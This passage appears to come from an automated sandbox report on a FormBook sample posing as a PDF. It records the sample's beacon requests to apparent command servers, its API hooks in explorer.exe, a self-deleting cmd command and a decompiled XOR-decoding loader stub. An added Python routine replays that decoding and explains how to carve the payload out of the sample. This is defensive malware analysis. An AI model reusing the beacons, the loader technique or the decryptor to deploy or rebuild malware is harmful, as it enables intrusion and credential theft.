Nov 20, 2020 09:05:53.221961021 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:53.273062944 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:06:01.685451031 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:06:01.715022087 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:06:15.634852886 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:06:15.769042015 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:06:34.651122093 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:06:35.659728050 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:06:36.660382986 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:06:38.675417900 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:06:39.683166027 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:06:40.687666893 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:06:41.688621044 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:06:43.702752113 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 20, 2020 09:06:40.687797070 CET | 192.168.2.5 | 8.8.8.8 | cff8 | (Port unreachable) | Destination Unreachable
Nov 20, 2020 09:06:41.688704014 CET | 192.168.2.5 | 8.8.8.8 | cff8 | (Port unreachable) | Destination Unreachable
Nov 20, 2020 09:06:43.702857018 CET | 192.168.2.5 | 8.8.8.8 | cff8 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 09:04:52.822020054 CET | 192.168.2.5 | 8.8.8.8 | 0x9015 | Standard query (0) | pilatescollective.com | A (IP address) | IN (0x0001)
Nov 20, 2020 09:05:30.082146883 CET | 192.168.2.5 | 8.8.8.8 | 0xc22e | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
Nov 20, 2020 09:05:53.221961021 CET | 192.168.2.5 | 8.8.8.8 | 0x52e5 | Standard query (0) | www.gcvinternational.com | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:15.634852886 CET | 192.168.2.5 | 8.8.8.8 | 0x5a49 | Standard query (0) | www.celebrations.sucks | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:34.651122093 CET | 192.168.2.5 | 8.8.8.8 | 0xa44b | Standard query (0) | www.montreynaud.com | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:35.659728050 CET | 192.168.2.5 | 8.8.8.8 | 0xa44b | Standard query (0) | www.montreynaud.com | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:36.660382986 CET | 192.168.2.5 | 8.8.8.8 | 0xa44b | Standard query (0) | www.montreynaud.com | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:38.675417900 CET | 192.168.2.5 | 8.8.8.8 | 0xa44b | Standard query (0) | www.montreynaud.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 09:04:52.981875896 CET | 8.8.8.8 | 192.168.2.5 | 0x9015 | No error (0) | pilatescollective.com | | 192.185.152.65 | A (IP address) | IN (0x0001)
Nov 20, 2020 09:05:30.126589060 CET | 8.8.8.8 | 192.168.2.5 | 0xc22e | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 09:05:53.273062944 CET | 8.8.8.8 | 192.168.2.5 | 0x52e5 | No error (0) | www.gcvinternational.com | gcvinternational.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 09:05:53.273062944 CET | 8.8.8.8 | 192.168.2.5 | 0x52e5 | No error (0) | gcvinternational.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:15.769042015 CET | 8.8.8.8 | 192.168.2.5 | 0x5a49 | No error (0) | www.celebrations.sucks | | 54.147.194.143 | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:39.683166027 CET | 8.8.8.8 | 192.168.2.5 | 0xa44b | Server failure (2) | www.montreynaud.com | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:40.687666893 CET | 8.8.8.8 | 192.168.2.5 | 0xa44b | Server failure (2) | www.montreynaud.com | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:41.688621044 CET | 8.8.8.8 | 192.168.2.5 | 0xa44b | Server failure (2) | www.montreynaud.com | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 09:06:43.702752113 CET | 8.8.8.8 | 192.168.2.5 | 0xa44b | Server failure (2) | www.montreynaud.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.gcvinternational.com
• www.celebrations.sucks

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49743 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 09:05:53.298646927 CET | 5388 | OUT | GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1
    Host: www.gcvinternational.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Nov 20, 2020 09:05:53.419409990 CET | 5389 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 20 Nov 2020 08:05:53 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "5fb6e13a-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49745 | 54.147.194.143 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 09:06:15.873560905 CET | 5399 | OUT | GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1
    Host: www.celebrations.sucks
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Nov 20, 2020 09:06:15.976310968 CET | 5400 | IN | HTTP/1.1 301 Moved Permanently
    Date: Fri, 20 Nov 2020 08:06:15 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Location: http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd
    Content-Length: 428
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 65 6c 65 62 72 61 74 69 6f 6e 73 2e 73 75 63 6b 73 2f 67 6e 75 3f 58 32 4d 78 49 6a 4a 50 3d 63 6d 2f 76 5a 49 69 56 33 4f 73 30 71 39 6d 33 77 56 39 4e 41 59 6e 52 38 34 45 70 45 4b 32 57 2f 71 68 43 78 4a 4b 57 43 56 65 6b 31 31 6a 6e 4a 31 41 34 4d 49 4e 66 42 34 50 69 50 6a 35 43 58 67 68 45 26 61 6d 70 3b 62 6c 79 3d 54 56 49 70 63 7a 30 30 34 52 6b 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 65 6c 65 62 72 61 74 69 6f 6e 73 2e 73 75 63 6b 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&amp;bly=TVIpcz004Rkd">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.celebrations.sucks Port 80</address></body></html>


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Nov 20, 2020 09:04:53.319391966 CET | 192.185.152.65 | 443 | 192.168.2.5 | 49718 | CN=www.pilatescollective.com | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | Fri Nov 06 01:22:43 CET 2020 | Thu Feb 04 01:22:43 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
(chain) | | | | | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu Mar 17 17:40:46 CET 2016 | Wed Mar 17 17:40:46 CET 2021 | |

Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xEB

                                                      Statistics

                                                      CPU Usage

                                                      Memory Usage

                                                      High Level Behavior Distribution

                                                      Behavior

System Behavior

General

Start time: 09:04:34
Start date: 20/11/2020
Path: C:\Users\user\Desktop\TR-D45.pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\TR-D45.pdf.exe'
Imagebase: 0x400000
File size: 86016 bytes
MD5 hash: 937841064411662C36469498EA645660
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Reputation: low

General

Start time: 09:04:42
Start date: 20/11/2020
Path: C:\Users\user\Desktop\TR-D45.pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\TR-D45.pdf.exe'
Imagebase: 0x400000
File size: 86016 bytes
MD5 hash: 937841064411662C36469498EA645660
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                      General

                                                      Start time:09:04:57
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:
                                                      Imagebase:0x7ff693d90000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:05:11
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\SysWOW64\control.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                      Imagebase:0x180000
                                                      File size:114688 bytes
                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:09:05:15
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'
                                                      Imagebase:0x150000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:05:16
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7ecfc0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis


                                                        Executed Functions

                                                        C-Code - Quality: 37%
                                                        			E00404E8F(intOrPtr* __eax) {
                                                        
                                                        				asm("scasd");
                                                        				 *__eax =  *__eax + __eax;
                                                        			}

                                                        Instruction addresses in the listing (the disassembly text itself was not extracted): 0x00404e8f, 0x00404e90

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: +$F$O$p$s
                                                        • API String ID: 0-3113303454
                                                        • Opcode ID: 1518644961977e53607821391e2a65a4fbc1e3db837fe2d10f19e1dfdac99b1d
                                                        • Instruction ID: d6d0998c07ddfbd142f0e66ead69afd6dcc0861d38d611d1150af61f6f6422ba
                                                        • Opcode Fuzzy Hash: 1518644961977e53607821391e2a65a4fbc1e3db837fe2d10f19e1dfdac99b1d
                                                        • Instruction Fuzzy Hash: 8381DE6269A3810AFF350534C9F073E2A65EB57300F749DBBCA82DADD6C56EC5C08223
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E0040568E() {
                                                        				intOrPtr* _t8;
                                                        				intOrPtr* _t26;
                                                        				void* _t44;
                                                        				void* _t55;
                                                        				void* _t57;
                                                        				void* _t60;
                                                        				signed int _t63;
                                                        				void* _t72;
                                                        				void* _t74;
                                                        
                                                        				// Opaque arithmetic and stores through unrelated pointers: obfuscation the
                                                        				// decompiler could not resolve (hence the 51% quality score).
                                                        				_t60 = (_t57 - 0x00000001 ^ 0x00000001) + 1;
                                                        				 *_t8 =  *_t8 + _t8;
                                                        				 *((intOrPtr*)(_t8 - 0x7cfe167d)) =  *((intOrPtr*)(_t8 - 0x7cfe167d)) + _t72;
                                                        				asm("stc");
                                                        				 *0x81 =  *0x81 + _t74;
                                                        				_t63 = _t60 + 2 ^ 0x00000001;
                                                        				// Counter spin loop; the real exit condition was not recovered by the decompiler.
                                                        				do {
                                                        					0;
                                                        					_t63 = _t63 + 1;
                                                        				} while (1 != 0x536fd28);
                                                        				// Walk backwards from the pointer stored at 0x40100c until the dword 0x02bb0d24 is found.
                                                        				_t26 =  *((intOrPtr*)(0x40100c));
                                                        				do {
                                                        					_t26 = _t26 - 1;
                                                        				} while ( *_t26 != 0x2bb0d24);
                                                        				// Allocate 0xF000 bytes for the decoded stage (the API trace below shows the raw
                                                        				// stack for the last two arguments, so the protection value is not readable here).
                                                        				_t44 = VirtualAlloc(0, 0xf000, 0x4444, 0x13); // executed
                                                        				// Copy 0xA3C0 bytes from the encrypted blob at 0x405a30 into the new buffer and
                                                        				// XOR each dword with 0xdd9a4ce4, walking down from offset 0xa3bc in steps of 4.
                                                        				// _t5 is an unresolved temporary; the next line shows the destination is _t44 + _t55.
                                                        				_t55 = 0xa3bc;
                                                        				do {
                                                        					 *_t5 =  *((intOrPtr*)(0x405a30 + _t55));
                                                        					 *(_t44 + _t55) =  *(_t44 + _t55) ^ 0xdd9a4ce4;
                                                        					_t55 = _t55 - 0x2c4 + 0x2c0; // net step of -4
                                                        				} while (_t55 >= 0);
                                                        				// Jump to the address in eax: control moves into the freshly decoded code.
                                                        				goto __eax;
                                                        			}

                                                        Instruction addresses in the listing (the disassembly text itself was not extracted): 0x004056ac, 0x004056b2, 0x004056b4, 0x004056ba, 0x004056bb, 0x004056d6, 0x004056df, 0x004056f0, 0x00405746, 0x00405750, 0x004057c9, 0x0040584b, 0x00405853, 0x0040585d, 0x004059bc, 0x004059d2, 0x004059e6, 0x004059f8, 0x00405a01, 0x00405a1e, 0x00405a1e, 0x00405a2c

                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,0000F000,-0000029E,-000000C3), ref: 004059BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: +$F$O$p$s
                                                        • API String ID: 4275171209-3113303454
                                                        • Opcode ID: 1e896ee5005e70ef9d603ecd9a3856708b99182ae35418daf456da89dfdc3287
                                                        • Instruction ID: c8290d001d4482e78a3617471f1e64713452166396b2d0cddba05fca4778cb9e
                                                        • Opcode Fuzzy Hash: 1e896ee5005e70ef9d603ecd9a3856708b99182ae35418daf456da89dfdc3287
                                                        • Instruction Fuzzy Hash: 2061C5A26A63424AFF381474CAF473E2556EB5A300F74AE3BCA43D6DC9D96EC1C04123
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
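What the decode loop in E0040568E amounts to, replayed in Python as an added example (this is not code from the report or from the sample): the key 0xDD9A4CE4, the starting offset 0xA3BC, the step of 4, the 0xF000-byte buffer and the source address 0x405A30 are read off the listing above. The encrypted bytes themselves are not on this page, so the block runs on a constructed blob that was encrypted with the same key; in practice you would feed it the 0xA3C0 bytes carved from the sample at 0x405A30.

```python
import struct
from typing import Optional

# Constants read off the decompiled loop in E0040568E on this page.
XOR_KEY = 0xDD9A4CE4             # *(buf + off) ^= 0xdd9a4ce4
LAST_OFFSET = 0xA3BC             # _t55 starts here and steps down by 4 until it goes negative
PAYLOAD_SIZE = LAST_OFFSET + 4   # 0xA3C0 bytes are touched in total
PAYLOAD_VA = 0x405A30            # source of the copy: an encrypted blob inside the .text section
STAGE_BUFFER_SIZE = 0xF000       # size passed to VirtualAlloc; PAYLOAD_SIZE fits inside it


def decode_payload(blob: bytes, key: int = XOR_KEY, last_offset: Optional[int] = None) -> bytes:
    """Replay the stub's decode loop on a copy of `blob`.

    The stub copies the blob into the fresh VirtualAlloc buffer and XORs each 32-bit
    little-endian dword with `key`, walking from `last_offset` down to offset 0.
    XOR with a constant is its own inverse, so this routine encrypts as well as decrypts.
    """
    if last_offset is None:
        last_offset = len(blob) - 4
    if last_offset < 0 or last_offset % 4 or last_offset + 4 > len(blob):
        raise ValueError("last_offset must be a dword-aligned offset inside the blob")

    buf = bytearray(blob)      # stands in for the region returned by VirtualAlloc
    off = last_offset
    while off >= 0:            # do { ... } while (_t55 >= 0)
        (dword,) = struct.unpack_from("<I", buf, off)
        struct.pack_into("<I", buf, off, dword ^ key)
        off -= 4               # _t55 = _t55 - 0x2c4 + 0x2c0
    return bytes(buf)


def carve_payload(image: bytes, file_offset: int, size: int = PAYLOAD_SIZE) -> bytes:
    """Slice the encrypted blob out of the on-disk sample.

    Assumption (not from the page): the caller has already translated PAYLOAD_VA to a
    file offset using the PE section table. The sample bytes are not reproduced here.
    """
    if file_offset < 0 or file_offset + size > len(image):
        raise ValueError("blob runs past the end of the file")
    return image[file_offset:file_offset + size]


# Constructed demonstration input, not bytes from the sample: a fake 24-byte stage,
# encrypted with the same key so that decode_payload() recovers it.
DEMO_PLAINTEXT = b"\x55\x8b\xec\x83\xec\x10" + b"CONSTRUCTED-DEMO" + b"\xc9\xc3"
DEMO_ENCRYPTED = decode_payload(DEMO_PLAINTEXT)   # symmetric: this is the "on disk" form


def demo() -> bytes:
    """Decode the constructed blob the way the stub would."""
    return decode_payload(DEMO_ENCRYPTED)


if __name__ == "__main__":
    print(demo().hex(" "))
```

Decoding in descending offset order, as the stub does, or in ascending order gives the same bytes; the walk is kept only to mirror the listing. On real output, check the start of the decoded buffer for a plausible function prologue or a PE header before dumping it, since a wrong key or offset produces uniformly random-looking bytes.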

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: W.E$1.!T
                                                        • API String ID: 1029625771-1435519016
                                                        • Opcode ID: 17f0bd04304c57b0151dc2c4a27f7e6c30faf2a92f358f8cbb536e5a690cc58f
                                                        • Instruction ID: 2a3cb653b2bb8ad52e602b63cf871f51b0ab7a8ccd88391bc8d5cb5dc620a05f
                                                        • Opcode Fuzzy Hash: 17f0bd04304c57b0151dc2c4a27f7e6c30faf2a92f358f8cbb536e5a690cc58f
                                                        • Instruction Fuzzy Hash: 4702C071B44307AEEF343A248D987FE226B9F47764FA44126EC8B675C2D775C885CA02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(023907A8,?,00000000,?,?,0000084D,8166FD38,?,?,00000000,?,00400000,?,00000000,00000000,?), ref: 02390772
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumInformationThreadWindows
                                                        • String ID: 1.!T$g=
                                                        • API String ID: 1954852945-1983186331
                                                        • Opcode ID: 64f2c8c95e42f37157b0b409363103d07314e0a22ab8fe801f649722301a3b01
                                                        • Instruction ID: 6050e1c91e1a3f97473fc44080966a60b0360592546d8f876c0d9658c65c3ab0
                                                        • Opcode Fuzzy Hash: 64f2c8c95e42f37157b0b409363103d07314e0a22ab8fe801f649722301a3b01
                                                        • Instruction Fuzzy Hash: 23418B717853066EEF246A3489E07EF22ABDF87370F648125FD534B2C5DBB0C8848A42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID: 1.!T
                                                        • API String ID: 449006233-3147410236
                                                        • Opcode ID: 03a7abbd617cc77d40e92e1a4292a8fd3daa3ab13abcaa83288c502fc692c93b
                                                        • Instruction ID: 17dda1c27b07c282ede5acd4eaffca004c4c6f36e75cde4d57b14d964946a3b6
                                                        • Opcode Fuzzy Hash: 03a7abbd617cc77d40e92e1a4292a8fd3daa3ab13abcaa83288c502fc692c93b
